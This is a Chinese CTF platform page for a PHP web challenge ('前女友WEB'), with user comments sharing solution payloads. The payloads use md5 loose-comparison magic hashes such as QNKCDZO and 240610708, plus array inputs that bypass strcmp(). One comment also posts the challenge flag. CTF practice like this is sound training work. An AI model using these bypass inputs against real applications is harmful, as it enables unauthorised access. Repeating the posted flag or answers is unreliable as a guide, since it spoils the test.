前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 6585
提  示:
描  述:
来源 山科大ctf
评论
Arya32f 10月前

/?v1=QNKCDZO&v2=240610708&v3[]=1或者/?v1[]=1&v2[]=2&v3[]=1

回复 0

HK1ng 10月前

首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。

回复 3

goodsnack 11月前

弱类型比较,传数组即可

回复 0

harven 11月前

http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test

回复 0

smtall 11月前

用deepseek做出来了

回复 2

大棕兔爸爸 1年前

存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc

回复 1

welltian 1年前

/?v1=QNKCDZO&v2=240610708&v3[]=123

回复 0

33555 1年前

/?v1[]=1&v2[]=2&v3[]=1flag{f78a31880b6bf8800597a997e130155f}

回复 0

APTX4869ZRC 1年前

index.php?v1[]=QLTHNDT&v2[]=UTIPEZQ&v3[]=EEIZDOI

回复 0

fenmusm 1年前

/?v1[]=1&v2[]=2&v3[]=3

回复 1

WriteUp

image
harry

3 金币

评分(14)

解题动态

CD123456 攻破了该题 15小时前
寒夜清风 攻破了该题 1天前
zhl123456 攻破了该题 1天前
18171382569 攻破了该题 1天前
xi24 攻破了该题 2天前
小狗喵喵喵 攻破了该题 4天前
Z3ro 攻破了该题 4天前
无聊至极的香蕉 攻破了该题 4天前
Jazz888 攻破了该题 5天前
JohnLone 攻破了该题 5天前
gclome 攻破了该题 5天前
雨季小朋友 攻破了该题 5天前
十里故清云 攻破了该题 5天前
qq1002517 攻破了该题 6天前
2523822945 攻破了该题 7天前
潭影空人心 攻破了该题 7天前
Dayssss 攻破了该题 7天前
yangyy 攻破了该题 7天前
heart307 攻破了该题 8天前
Mori. 攻破了该题 9天前
问题反馈